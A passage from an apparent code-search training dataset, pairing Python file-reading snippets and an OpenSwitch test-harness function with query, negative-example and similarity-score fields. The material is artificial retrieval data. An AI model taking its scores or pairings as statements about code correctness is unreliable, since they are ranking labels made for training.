'').strip('\"') or None\n )\n except IOError as e:\n reporting.report_generic(\n title='Error while collecting system OS facts',\n summary=str(e),\n severity='high',\n flags=['inhibitor'])\n return None", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n result = self.__find_project(project)\r\n if (result != None) and (self._config.get_boolean('releasable', False)):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % result)\r\n data['name'] = result.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = result.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + result.objectname + \" because the 'baseline.release' property is missing.\")\r\n return data", "def read_inventory_file():\n try:\n with open('inventory', 'r') as file:\n inventory = file.read()\n return inventory\n except OSError:\n pass", "def extract_release_data(self):\r\n data = None\r\n session = self.get_session()\r\n project = session.create(self._config.name)\r\n \r\n session.home = self._config['dir']\r\n \r\n if self._config.get_boolean('releasable', False):\r\n if 'baseline.release' in self._config:\r\n data = {}\r\n _logger.info(\"Releasing: '%s'\" % project)\r\n data['name'] = project.objectname\r\n data['database'] = session.database()\r\n data['role'] = ccm.get_role_for_purpose(session, str(self._config['purpose']))\r\n data['dir'] = os.path.normpath(self._config['dir'])\r\n data['pst'] = project.name\r\n data['release'] = self._config['baseline.release']\r\n else:\r\n _logger.warning(\"Could not release \" + project + \" because the 'baseline.release' property is missing.\")\r\n return data", "def read_file(self, currentIndex):\n handle = open(\"Program Files\\\\\" + str(currentIndex) + \".tvInfo\", 
\"r\")\n data = handle.read() #reading description\n handle.close()\n return data", "def read_file(self, currentIndex):\n handle = open(\"Program Files\\\\TvInfo\\\\\" + str(currentIndex) + \".tvInfo\", \"r\")\n data = handle.read() #reading description\n handle.close()\n return data", "def freedesktop_os_release():\n global _os_release_cache\n\n if _os_release_cache is None:\n errno = None\n for candidate in _os_release_candidates:\n try:\n with open(candidate, encoding=\"utf-8\") as f:\n _os_release_cache = _parse_os_release(f)\n break\n except OSError as e:\n errno = e.errno\n else:\n raise OSError(\n errno,\n f\"Unable to read files {', '.join(_os_release_candidates)}\"\n )\n\n return _os_release_cache.copy()", "def read_local_file(filename):\n import fsspec\n fs = fsspec.filesystem('file')\n\n with fs.open(filename) as f:\n data = loads(f.read())\n\n return data", "def local_read(filename):\n full_filename = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n filename)\n return codecs.open(full_filename, 'r', 'utf-8').read()", "def ReadVersion():\n return _ReadNumericFile(pathutils.JOB_QUEUE_VERSION_FILE)", "def readLib(self):\n\t\tdata = self._fileSystem.readLib()\n\t\tif data is None:\n\t\t\treturn\n\t\treturn data", "def read_file():\n with open(FILE_NAME) as f:\n data = f.read()\n return data", "def read_file(self):\n self._apply_shared_lock()\n\n self.handle = self._open_file_r()\n out = self._deserialize(self.handle)\n self.handle.close()\n\n self._release_lock()\n\n return out", "def open_and_read_file():\n file_path = sys.argv[1]\n #print file_path\n file_data = open(file_path, 'r')\n gettysburg = file_data.read()\n\n return gettysburg", "def data_file(self, path):\n return open(os.path.join(self.resource_path, path)).read()", "def read(self, filename):\r\n with temporary_file() as fp:\r\n os.unlink(fp.name)\r\n if self._call(\"-copyToLocal\", filename, fp.name) == 0:\r\n with open(fp.name) as f:\r\n return f.read()\r\n else:\r\n return None", "def _read_file(self) -> str:\n with open(self._file_name) as fp:\n return fp.read()", "def get(self, filename, **kw):\n\n file_path = os.path.join(self.storage_path, filename)\n try:\n file_obj = open(file_path, \"r\")\n except IOError:\n return\n else:\n return file_obj.read()", "def read(cls):\n x_i=\"vas.txt\"\n with open(x_i, 'r')as txt_file:\n file = txt_file.read()\n return file", "def get_content(self):\n version_file = self.wp_path + '/wp-includes/version.php'\n\n if (self.host == None and self.user == None):\n with open(version_file) as versionfile:\n return versionfile.read()\n\n from connection import SSHClient\n with SSHClient(self.host, self.user) as conn:\n return conn.readfile(version_file)", "def read(rel_path):\n here = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(here, rel_path), \"r\") as fp:\n return fp.read()", "def _GetFileContents(filename):\n fpath = os.path.join(PROGRAM_FILES_DIR, filename)\n if os.path.isfile(fpath):\n with open(fpath, 'r') as f:\n content = f.read()\n else:\n content = pkgutil.get_data('gslib', filename)\n fpath = None\n if content is not None:\n if sys.version_info.major > 2 and isinstance(content, bytes):\n content = content.decode('utf-8')\n content = content.strip()\n return (fpath, content)", "def get_file_data(filename):", "def get_data_from_storage(data_file):\n print(f\"{CR}Yipes, I don't know how to pull data from dvc yet{C0}\")", "def read(path):", "def read(fname):\n f = fabio.open(fname)\n data = f.data\n del f; # close file\n return data", "def 
read(self):\n\t\tself.file.seek(0)\n\t\treturn self.file.read().strip()" ]
[ "0.6877728", "0.6081906", "0.6046769", "0.6038422", "0.60357785", "0.6028265", "0.6022373", "0.6018158", "0.60076445", "0.59902287", "0.593641", "0.589239", "0.5883661", "0.587215", "0.5849723", "0.5803643", "0.5778237", "0.57766265", "0.5729708", "0.5707521", "0.5704802", "0.5701879", "0.5695572", "0.5690179", "0.5680807", "0.5660659", "0.56528914", "0.5640892", "0.56310564", "0.5579904" ]
0.68287444
1
Copy a given osrelease file to /etc/osrelease.
def copy_os_release_file(dut, fname=default_os_release_file): # src = os.path.join(os.path.sep, 'shared', os_release_files_dir, fname) dst = os.path.join(os.path.sep, 'etc', 'os-release') dut("/bin/cp /tmp/files/os_releases/" + fname + " " + dst, shell="bash")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update_os_release_file(**kwargs):\n\n LOGGER.info(\"Doing pre-flight checks\")\n\n releases_repo_url = OPENSTACK_REPOS + '/releases.git'\n releases_folder = kwargs['workdir'] + '/releases'\n\n oa_folder = kwargs['workdir'] + '/openstack-ansible'\n click.confirm((\"Are your sure your {} folder is properly \"\n \"checked out at the right version?\").format(oa_folder),\n abort=True)\n\n # Args validation\n if kwargs['branch'] not in VALID_CODE_NAMES:\n raise SystemExit(\"Invalid branch name {}\".format(kwargs['branch']))\n\n # Version validation\n if kwargs['version'] == \"auto\":\n fpth, version = get_oa_version(oa_folder)\n LOGGER.info(\"Version {} found in {}\".format(version, fpth))\n if version == \"master\":\n raise SystemExit(\"You should not release from a moving target\")\n else:\n version = kwargs['version']\n\n pre_release = (version.endswith(PRE_RELEASE_PREFIXES))\n\n if not pre_release:\n # For extra safety, ensure it's semver.\n try:\n semver_res = semver.parse(version)\n except Exception as exc:\n raise SystemExit(exc)\n major_version = semver_res['major']\n else:\n major_version = int(version.split(\".\")[0])\n\n if major_version != VALID_CODE_NAMES[kwargs['branch']]:\n raise SystemExit(\"Not a valid number for this series\")\n # Args validation done.\n\n yaml = YAML()\n oa = Repo(oa_folder)\n head_commit = oa.head.commit\n LOGGER.info(\"OpenStack-Ansible current SHA {}\".format(head_commit))\n if os.path.lexists(releases_folder):\n click.confirm('Deleting ' + releases_folder + '. OK?', abort=True)\n shutil.rmtree(releases_folder)\n releases_repo = Repo.clone_from(\n url=releases_repo_url,\n to_path=releases_folder,\n branch=\"master\")\n\n LOGGER.info(\"Reading ansible-role-requirements\")\n arr, _, _ = load_yaml(kwargs['workdir'] + ARR_PATH)\n\n LOGGER.info(\"Reading releases deliverable for the given branch\")\n deliverable_file_path = ('deliverables/' + kwargs['branch'] +\n '/openstack-ansible.yaml')\n deliverable_file = releases_folder + \"/\" + deliverable_file_path\n deliverable, ind, bsi = load_yaml(deliverable_file)\n\n # if no releases yet (start of cycle), prepare releases, as a list\n if not deliverable.get('releases'):\n deliverable['releases'] = []\n\n # Ensure the new release is last\n deliverable['releases'].append(\n {'version': \"{}\".format(version),\n 'projects': []}\n )\n\n # Now we can build in the order we want and still keep std dicts\n deliverable['releases'][-1]['projects'].append(\n {'repo': 'openstack/openstack-ansible',\n 'hash': \"{}\".format(head_commit)}\n )\n\n # Select OpenStack Projects and rename them for releases.\n # Keep their SHA\n regex = re.compile('^' + OPENSTACK_REPOS + '/.*')\n for role in arr:\n if regex.match(role['src']):\n deliverable['releases'][-1]['projects'].append(\n {'repo': urlparse(role['src']).path.lstrip('/'),\n 'hash': role['version']}\n )\n\n with open(deliverable_file, 'w') as df_h:\n yaml.explicit_start = True\n yaml.block_seq_indent = bsi\n yaml.indent = ind\n yaml.dump(deliverable, df_h)\n LOGGER.info(\"Patched!\")\n\n if kwargs['commit']:\n message = \"\"\"Release OpenStack-Ansible {}/{}\n\n \"\"\".format(kwargs['branch'], version)\n releases_repo.index.add([deliverable_file_path])\n releases_repo.index.commit(message)", "def get_os_release(release_file=constants.OS_RELEASE_FILE):\n linux_distro = ('', '', '')\n\n try:\n with open(release_file, 'r') as f:\n data = f.read()\n linux_distro = (\n _get_key_from_file(data, 'ID'),\n _get_key_from_file(data, 'VERSION'),\n '')\n except Exception as e:\n raise 
exception.SysinvException(_(\n \"Failed to open %s : %s\") % (release_file, str(e)))\n\n if linux_distro[0] == '':\n raise exception.SysinvException(_(\n \"Could not determine os type from %s\") % release_file)\n\n # Hint: This code is added here to aid future unit test.\n # Probably running unit tests on a non-supported OS (example at\n # time of writing: ubuntu), which is perfect, because code reaching\n # here will fail, and we just identified a place that would split\n # logic between OSs. The failing tests should mock this function\n # (get_os_release) for each supported OS.\n if linux_distro[0] not in constants.SUPPORTED_OS_TYPES:\n raise exception.SysinvException(_(\n \"Unsupported OS detected %s\") % linux_distro[0])\n\n return linux_distro", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', '').strip('\"') or None\n )\n except IOError as e:\n reporting.report_generic(\n title='Error while collecting system OS facts',\n summary=str(e),\n severity='high',\n flags=['inhibitor'])\n return None", "def get_os_release(path):\n try:\n with open(path) as f:\n data = dict(l.strip().split('=', 1) for l in f.readlines() if '=' in l)\n return OSRelease(\n release_id=data.get('ID', '').strip('\"'),\n name=data.get('NAME', '').strip('\"'),\n pretty_name=data.get('PRETTY_NAME', '').strip('\"'),\n version=data.get('VERSION', '').strip('\"'),\n version_id=data.get('VERSION_ID', '').strip('\"'),\n variant=data.get('VARIANT', '').strip('\"') or None,\n variant_id=data.get('VARIANT_ID', '').strip('\"') or None\n )\n except IOError as e:\n raise StopActorExecutionError(\n message='Cannot collect the system OS facts.',\n details={'details': str(e)}\n )", "def _autoconfig_backup_file(filename):\n\n # Does a copy of the file exist, if not create one\n ofile = filename + \".orig\"\n (ret, stdout, stderr) = VPPUtil.exec_command(\"ls {}\".format(ofile))\n if ret != 0:\n logging.debug(stderr)\n if stdout.strip(\"\\n\") != ofile:\n cmd = \"sudo cp {} {}\".format(filename, ofile)\n (ret, stdout, stderr) = VPPUtil.exec_command(cmd)\n if ret != 0:\n logging.debug(stderr)", "def _copy_asoundconf(asoundconf_file):\n this_dir, this_filename = os.path.split(__file__)\n asoundconf_path = os.path.join(this_dir, MicrophoneSetup.ASOUNDCONF_PATH, asoundconf_file)\n shutil.copy2(asoundconf_path, ASOUNDCONF_DEST_PATH)", "def read_os_release_file(dut, fname=default_os_release_file, key=None):\n cur_dir, f = os.path.split(__file__)\n path = os.path.join(cur_dir, os_release_files_dir, fname)\n d = {}\n with open(path) as f:\n for line in f:\n k, v = line.rstrip().split(\"=\")\n d[k] = v\n if key:\n return d[key]\n else:\n return d", "def replace_file(filename, contents):\n filename = path.join(PATH_ROOT, filename)\n filename_bak = \"%s.release.bak\" % filename\n os.rename(filename, filename_bak)\n with open(filename, \"w\") as out_file:\n out_file.write(\"\".join(contents))\n shutil.copymode(filename_bak, filename)\n os.remove(filename_bak)", "def etc(c):\n utils.new_release(\n conn,\n deploy_root=SALT_DEPLOY_PATH,\n in_repo_path=\"etc\",\n release_path=\"/etc/salt\",\n branch=SALT_BRANCH,\n )\n 
conn.sudo(\"systemctl restart salt-master\", pty=True)", "def get_host_ubuntu_release():\r\n with open('/etc/lsb-release') as config:\r\n for line in config:\r\n k, v = line.split('=')\r\n\r\n if k == 'DISTRIB_CODENAME':\r\n return v.strip(string.whitespace + '\\'\"')\r\n\r\n raise ValueError('Corrupt release information.')", "def create_config_file(original_file, copy_file):\n copy(original_file, copy_file)", "def add_source(name, source_url, section):\n # lsb_release is not installed in most docker images by default\n distro = (\n subprocess.check_output(\n [\"/bin/bash\", \"-c\", \"source /etc/os-release && echo ${VERSION_CODENAME}\"],\n stderr=subprocess.STDOUT,\n )\n .decode()\n .strip()\n )\n line = f\"deb {source_url} {distro} {section}\\n\"\n with open(os.path.join(\"/etc/apt/sources.list.d/\", name + \".list\"), \"a+\") as f:\n # Write out deb line only if it already doesn't exist\n f.seek(0)\n if line not in f.read():\n f.write(line)\n f.truncate()\n utils.run_subprocess([\"apt-get\", \"update\", \"--yes\"])", "def copy_supervisor_file():\n\n # check if the supervisor file exists\n if not os.path.isfile(\"./text_embeddings.conf\"):\n return Exception(\"File text_embeddings.conf does not exist\")\n\n # otherwise check if the supervisor folder exists\n if not os.path.exists(\"/etc/supervisor/conf.d\"):\n return Exception(\"Supervisor is not installed or folder /etc/supervisor/conf.d does not exist\")\n\n # copy the file to the final destination\n copyfile(\"./text_embeddings.conf\", \"/etc/supervisor/conf.d/text_embeddings.conf\")", "def __upgrade_install__(path, release):\n install = Popen([\"freebsd-update\", \"-b\", path, \"-d\",\n \"{}/var/db/freebsd-update/\".format(path), \"-f\",\n \"{}/etc/freebsd-update.conf\".format(path), \"-r\",\n release, \"install\"], stderr=PIPE)\n install.communicate()\n\n return install.returncode", "def copy_file(va_bucket, or_bucket, uuid):\n key = va_bucket.get_key(uuid)\n metadata = key.metadata\n header_data = {\"Content-Type\": key.content_type }\n print(\" {0} to OR\".format(uuid))\n or_bucket.copy_key(uuid, VA_BUCKET_NAME, uuid, headers=header_data, metadata=metadata)", "def symlink_current_release():\n require(\"release\", provided_by=[deploy])\n with cd(\"%(path)s/releases\" % env):\n sudo(\"ln -s %(release)s current_tmp && mv -Tf current_tmp current\" % env)", "def cp_to_file(fn0, fn):\n\n # keep rewriting attributes\n shutil.copyfile(fn0, fn)", "def replace_write(filename, destination):\n if not os.path.isfile(filename):\n print \"WARNING: File not found at %s, skipping write\" % filename\n return\n\n with open(filename, 'r') as infile:\n content = infile.read()\n content_expanded = re.sub(ENV_PATTERN, lambda match: env(match.group(1)), content)\n mkpath(os.path.dirname(os.path.realpath(destination)))\n with open(destination, 'w') as outfile:\n outfile.write(content_expanded)", "def put(self, src, dst):\r\n abs_src = os.path.expanduser(src)\r\n assert os.path.exists(abs_src), 'File does not exist, cannot copy: %s' % abs_src\r\n return self._do_put(abs_src, dst)", "def copy_file(src, dest):\n logger.debug(\"Copying %s to %s\", src, dest)\n try:\n shutil.copy(src, dest)\n except (OSError, IOError) as exc:\n logger.debug('Installation error, trying sudo.')\n try:\n check_call(['sudo', 'cp', src, dest])\n except HelperError:\n # That failed too - re-raise the original exception\n raise exc\n return True", "def build_specfile(target, source, env):\n with open(target[0].get_abspath(), 'w') as ofp:\n try:\n 
ofp.write(build_specfile_header(env))\n ofp.write(build_specfile_sections(env))\n ofp.write(build_specfile_filesection(env, source))\n\n # call a user specified function\n if 'CHANGE_SPECFILE' in env:\n env['CHANGE_SPECFILE'](target, source)\n\n except KeyError as e:\n raise SCons.Errors.UserError('\"%s\" package field for RPM is missing.' % e.args[0])", "def move_hosts_file_into_place(final_file): # noqa: W605\n\n filename = os.path.abspath(final_file.name)\n\n try:\n if not Path(filename).exists():\n raise FileNotFoundError\n except Exception:\n print_failure(f\"{filename} does not exist.\")\n return False\n\n if platform.system() == \"Windows\":\n target_file = str(Path(os.getenv(\"SystemRoot\")) / \"system32\" / \"drivers\" / \"etc\" / \"hosts\")\n else:\n target_file = \"/etc/hosts\"\n\n if os.getenv(\"IN_CONTAINER\"):\n # It's not allowed to remove/replace a mounted /etc/hosts, so we replace the content.\n # This requires running the container user as root, as is the default.\n print(f\"Running in container, so we will replace the content of {target_file}.\")\n try:\n with open(target_file, \"w\") as target_stream:\n with open(filename, \"r\") as source_stream:\n source = source_stream.read()\n target_stream.write(source)\n return True\n except Exception:\n print_failure(f\"Replacing content of {target_file} failed.\")\n return False\n elif platform.system() == \"Linux\" or platform.system() == \"Windows\" or platform.system() == \"Darwin\":\n print(\n f\"Replacing {target_file} requires root privileges. You might need to enter your password.\"\n )\n try:\n subprocess.run(SUDO + [\"cp\", filename, target_file], check=True)\n return True\n except subprocess.CalledProcessError:\n print_failure(f\"Replacing {target_file} failed.\")\n return False", "def copy_file(file: str, dest: str) -> None:\n\tuux.show_debug(\"Copying \" + str(file) + \" => \" + str(dest))\n\tshutil.copy2(file, dest)", "def copybin(src, dst, proc, par):\n filename = 'proc%06d_%s.bin' % (proc, par)\n copyfile(join(src, filename), join(dst, filename))", "def copy_file(rpath, rootdir, repodir, repo_file=None):\n\n if repo_file is None:\n repo_file = os.path.join(repodir, rpath)\n dirname = os.path.dirname(repo_file)\n if dirname and not os.path.isdir(dirname):\n os.makedirs(dirname)\n etc_file = os.path.join(rootdir, rpath)\n # Remove destination if source is a symlink or if destination is a symlink\n # (in the last case, source would be copied to the file pointed by\n # destination instead of having the symlink itself being copied).\n if os.path.lexists(repo_file) and (os.path.islink(etc_file) or\n os.path.islink(repo_file)):\n os.remove(repo_file)\n shutil.copy2(etc_file, repo_file, follow_symlinks=False)", "def copy_build():\n\n print 'Copying build file to Android assets directory...',\n\n src = BUILD_PATH + DB_NAME\n dst = ASSETS_PATH + DB_NAME\n \n shutil.copyfile(src, dst)\n \n print 'done.'", "def copyfile(self, source, outputfile):\n shutil.copyfileobj(source, outputfile)", "def copyfile(self, source, outputfile):\n shutil.copyfileobj(source, outputfile)", "def copyfile(self, source, outputfile):\n shutil.copyfileobj(source, outputfile)", "def make_release():\n parser = OptionParser()\n parser.add_option(\"-d\", \"--destination\", action=\"store\", type=\"string\", \n dest=\"destdir\",\n help=\"directory where distributions and docs will be placed\")\n parser.add_option(\"-v\", \"--version\", action=\"store\", type=\"string\", \n dest=\"version\",\n help=\"version string applied to all openmdao 
distributions\")\n parser.add_option(\"-m\", action=\"store\", type=\"string\", dest=\"comment\",\n help=\"optional comment for version tag\")\n parser.add_option(\"-b\", \"--basebranch\", action=\"store\", type=\"string\", \n dest=\"base\", default='master', \n help=\"base branch for release. defaults to master\")\n parser.add_option(\"-t\", \"--test\", action=\"store_true\", dest=\"test\",\n help=\"used for testing. A release branch will not be created\")\n parser.add_option(\"-n\", \"--nodocbuild\", action=\"store_true\", \n dest=\"nodocbuild\",\n help=\"used for testing. The docs will not be rebuilt if they already exist\")\n parser.add_option(\"--host\", action='append', dest='hosts', metavar='HOST',\n default=[],\n help=\"host from config file to build bdist_eggs on. \"\n \"Multiple --host args are allowed.\")\n parser.add_option(\"-c\", \"--config\", action='store', dest='cfg', \n metavar='CONFIG', default='~/.openmdao/testhosts.cfg',\n help=\"path of config file where info for hosts is located\")\n (options, args) = parser.parse_args(sys.argv[1:])\n \n if not options.version or not options.destdir:\n parser.print_help()\n sys.exit(-1)\n \n _check_version(options.version)\n\n options.cfg = os.path.expanduser(options.cfg)\n \n config = ConfigParser.ConfigParser()\n config.readfp(open(options.cfg))\n \n haswin = False\n for host in options.hosts:\n if host == 'localhost':\n if sys.platform.startswith('win'):\n haswin = True\n elif config.has_section(host):\n platform = config.get(host, 'platform')\n if platform == 'windows':\n haswin = True\n if not haswin:\n print \"no windows host was specified, so can't build binary eggs for windows\"\n sys.exit(-1)\n \n orig_branch = get_git_branch()\n if not orig_branch:\n print \"You must run mkrelease from within a git repository. aborting\"\n sys.exit(-1)\n\n if not options.test:\n if orig_branch != options.base:\n print \"Your current branch '%s', is not the specified base branch '%s'\" % (orig_branch, options.base)\n sys.exit(-1)\n \n if _has_checkouts():\n print \"There are uncommitted changes. You must run mkrelease.py from a clean branch\"\n sys.exit(-1)\n \n if orig_branch == 'master':\n print \"pulling master\"\n os.system(\"git pull origin master\")\n if _has_checkouts():\n print \"something went wrong during pull. aborting\"\n sys.exit(-1)\n else:\n print \"WARNING: base branch is not 'master' so it has not been\"\n print \"automatically brought up-to-date.\"\n answer = raw_input(\"Proceed? 
(Y/N) \")\n if answer.lower() not in [\"y\", \"yes\"]:\n sys.exit(-1)\n \n relbranch = \"release_%s\" % options.version\n if relbranch in get_git_branches():\n print \"release branch %s already exists in this repo\" % relbranch\n sys.exit(-1)\n\n print \"creating release branch '%s' from base branch '%s'\" % (relbranch, orig_branch)\n check_call(['git', 'branch', relbranch])\n print \"checking out branch '%s'\" % relbranch\n check_call(['git', 'checkout', relbranch])\n \n destdir = os.path.abspath(options.destdir)\n if not os.path.exists(destdir):\n os.makedirs(destdir)\n\n startdir = os.getcwd()\n topdir = repo_top()\n \n cfgpath = os.path.expanduser(options.cfg)\n \n try:\n _update_releaseinfo_files(options.version)\n \n # build the docs\n docdir = os.path.join(topdir, 'docs')\n idxpath = os.path.join(docdir, '_build', 'html', 'index.html')\n \n if not os.path.isfile(idxpath) or not options.nodocbuild:\n build_docs(argv=['-v', options.version])\n shutil.copytree(os.path.join(topdir,'docs','_build', 'html'), \n os.path.join(destdir,'docs'))\n\n if not options.test:\n # commit the changes to the release branch\n print \"committing all changes to branch '%s'\" % relbranch\n check_call(['git', 'commit', '-a', '-m', \n '\"updating releaseinfo files for release %s\"' % \n options.version])\n\n # build openmdao package distributions\n proj_dirs = []\n for project_name, pdir, pkgtype in openmdao_packages:\n pdir = os.path.join(topdir, pdir, project_name)\n if 'src' in os.listdir(pdir):\n os.chdir(os.path.join(pdir, 'src'))\n else:\n os.chdir(pdir)\n print 'building %s' % project_name\n _build_sdist(pdir, destdir, options.version)\n if pkgtype == 'bdist_egg':\n proj_dirs.append(pdir)\n \n os.chdir(startdir)\n _build_bdist_eggs(proj_dirs, destdir, options.hosts, cfgpath)\n \n print 'creating bootstrapping installer script go-openmdao.py'\n installer = os.path.join(os.path.dirname(__file__),\n 'mkinstaller.py')\n \n check_call([sys.executable, installer, '--dest=%s'%destdir])\n\n if options.comment:\n comment = options.comment\n else:\n comment = 'creating release %s' % options.version\n \n if options.test:\n _rollback_releaseinfo_files()\n else:\n # tag the current revision with the release version id\n print \"tagging release with '%s'\" % options.version\n check_call(['git', 'tag', '-f', '-a', options.version, '-m', comment])\n \n check_call(['git', 'checkout', orig_branch])\n print \"\\n*REMEMBER* to push '%s' up to the master branch if this release is official\" % relbranch\n \n print \"new release files have been placed in %s\" % destdir\n \n finally:\n os.chdir(startdir)" ]
[ "0.5891819", "0.5617878", "0.5600983", "0.54453236", "0.5412584", "0.5301226", "0.5192675", "0.5176676", "0.5082615", "0.50576097", "0.50236535", "0.5004781", "0.50029683", "0.49893183", "0.4973388", "0.49352297", "0.49307936", "0.4925656", "0.49127647", "0.49001563", "0.48605695", "0.4854662", "0.48353156", "0.4804392", "0.47576368", "0.47208738", "0.47136053", "0.47136053", "0.47136053", "0.46945816" ]
0.7919572
0
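For context on the release-script row above: the `_has_checkouts()` guard checks whether the git working tree is dirty before cutting a release branch. Its body is not included in the row, so the sketch below is an illustrative assumption (name and approach invented here), not the script's actual helper:

import subprocess

def has_uncommitted_changes():
    # "git status --porcelain" prints one line per modified or untracked
    # file, so any output at all means the working tree is not clean.
    out = subprocess.check_output(['git', 'status', '--porcelain'])
    return bool(out.strip())

A clean tree yields empty output, which keeps the release branch reproducible from a known commit.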
Removes the OpenSwitch DB from ovsdb-server. It also removes the DB file from the file system.
def stop_ovsdb(dut): # Remove the database from the ovsdb-server. dut(ovs_appctl + "-t ovsdb-server ovsdb-server/remove-db OpenSwitch", shell="bash") # Remove the DB file from the file system. dut("/bin/rm -f /var/run/openvswitch/ovsdb.db", shell="bash")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def db_remove():\n\n db.session.close()\n db.drop_all()\n\n path = current_app.config['SNER_VAR']\n for file_object in os.listdir(path):\n file_object_path = os.path.join(path, file_object)\n if os.path.isdir(file_object_path):\n shutil.rmtree(file_object_path)\n else:\n os.unlink(file_object_path)", "def drop_db(self):\n db_name = self.db.db_url.split('///')[1]\n if os.path.exists(db_name):\n os.remove(db_name)", "def delete_db(self):\n import os.path\n os.remove(self.filepath)", "def remove(self, db_name):\n path = self.get_path(db_name)\n os.remove(path)", "def removedb(dbname):\n os.system(\"dropdb %s\" % dbname)", "def remove():\n\n db_remove()", "def drop_db():\n database.db.reflect()\n database.db.drop_all()\n print('Dropped the database')", "def drop_db() -> None:\n \n if os.environ.get('DATABASE_URL').startswith('sqlite:///'):\n sqlite_s, sqlite_f = os.environ.get('DATABASE_URL').split(\"sqlite:///\") \n os.unlink(sqlite_f)\n else: \n Base.metadata.drop_all(bind=engine)", "def fd_remove(db_name):\n names = FdMultiController.fd_list()\n if db_name not in names:\n # nothing to do\n return\n names.remove(db_name)\n with open(\n FdMultiController._path_generator(FdMultiController._db_registry_name), \"wb\"\n ) as file:\n pickle.dump(names, file)\n os.remove(FdMultiController._path_generator(db_name))", "def delete():\n\n from slicr.extensions import db\n\n click.echo('deleting database...')\n\n db.drop_all()", "def tearDown(self):\n os.close(self.db_fd)\n os.unlink(closet.app.config['DATABASE'])", "def erase_db(file):\n open(file, 'w').close()", "def delete_db():\n db.drop_all()", "def cleanup(self):\n if os.path.exists(self._db):\n os.remove(self._db)", "def removedb():\n\n try:\n os.remove(rebasedb)\n except OSError:\n pass", "def tearDown(self):\n os.close(self.db_fd)\n os.unlink(app.app.config['DATABASE'])", "def tearDown(self):\n os.close(self.db_fd)\n os.unlink(pegasus.app.config['DATABASE'])", "def drop_database():\n drop_db(app)", "def deleteDB():\n db = sqlite.connect(db_path)\n db.row_factory = sqlite.Row\n cursor = db.cursor()\n cursor.execute(\"DELETE from rooms\")\n\n cursor.execute(\"DELETE from users\")\n\n cursor.execute(\"DELETE from urls\")\n\n cursor.fetchall()\n db.commit()\n cursor.close()\n db.close()", "def delete_database(self, name_or_obj):\n name = utils.get_name(name_or_obj)\n self._database_manager.delete(name)", "def tearDown(self):\n os.remove(self._dbfile)", "def dropdb():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()" ]
[ "0.7118374", "0.70850265", "0.6969073", "0.6936522", "0.6843543", "0.6600032", "0.6549064", "0.6437333", "0.6426025", "0.6383878", "0.636996", "0.63381946", "0.6297148", "0.62754035", "0.62196547", "0.6199373", "0.6198524", "0.6159389", "0.6147187", "0.61467093", "0.61348754", "0.6120796", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403", "0.6067403" ]
0.76180816
0
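A minimal usage sketch for the stop_ovsdb document above, written as a topology-style test. The `dut` fixture, the `ovs_appctl` prefix value, and the assumption that calling `dut(...)` returns the command's output are all illustrative assumptions, not part of the original row:

ovs_appctl = "/usr/bin/ovs-appctl "  # assumed binary path

def test_stop_ovsdb_removes_db_file(dut):
    stop_ovsdb(dut)
    # After teardown the DB file should be gone from the file system.
    listing = dut("ls /var/run/openvswitch/", shell="bash")
    assert "ovsdb.db" not in listing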
Draws the range of the tower if it is clicked on.
def draw_range(self, win): if self.selected: surface = pygame.Surface((self.range * 4, self.range * 4), pygame.SRCALPHA, 32) pygame.draw.circle(surface, (128, 128, 128, 100), (self.range, self.range), self.range, 0) win.blit(surface, (self.x - self.range, self.y - self.range))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw_bounds():\n\n pass", "def draw(self):\n if context.click():\n self.place()", "def draw(self):\n #for (x, y) in self.coords:\n # pyxel.rect(\n # (x + self.x) * 4,\n # (y + self.y) * 4,\n # (x + self.x) * 4 + 3,\n # (y + self.y) * 4 + 3,\n # self.color)", "def range(self, event):\r\n \r\n p = (event.x, self.toCartesian(event.y))\r\n \r\n if self.selectedRegion is None:\r\n self.selectedStart = Region(p[X],p[Y], p[X],p[Y])\r\n self.selectedRegion = self.selectedStart.unionPoint(p)\r\n \r\n self.paint()\r\n \r\n # return (node,sub-tree) where sub-tree is True if draining entire tree\r\n # rooted at node. Draw these as shaded red rectangle to identify whole\r\n # sub-tree is selected.\r\n for pair in self.tree.range(self.selectedRegion):\r\n p = pair[0].point\r\n \r\n if pair[1]:\r\n self.canvas.create_rectangle(pair[0].region.x_min, self.toTk(pair[0].region.y_min), \r\n pair[0].region.x_max, self.toTk(pair[0].region.y_max),\r\n fill='Red', stipple='gray12')\r\n else:\r\n self.canvas.create_rectangle(p[X] - BoxSize, self.toTk(p[Y]) - BoxSize, \r\n p[X] + BoxSize, self.toTk(p[Y]) + BoxSize, fill='Red')\r\n\r\n self.queryRect = self.canvas.create_rectangle(self.selectedRegion.x_min, self.toTk(self.selectedRegion.y_min), \r\n self.selectedRegion.x_max, self.toTk(self.selectedRegion.y_max), \r\n outline='Red', dash=(2, 4))", "def draw(self):\n if self.is_clicked:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 0)\n else:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 1)", "def onclick(self, 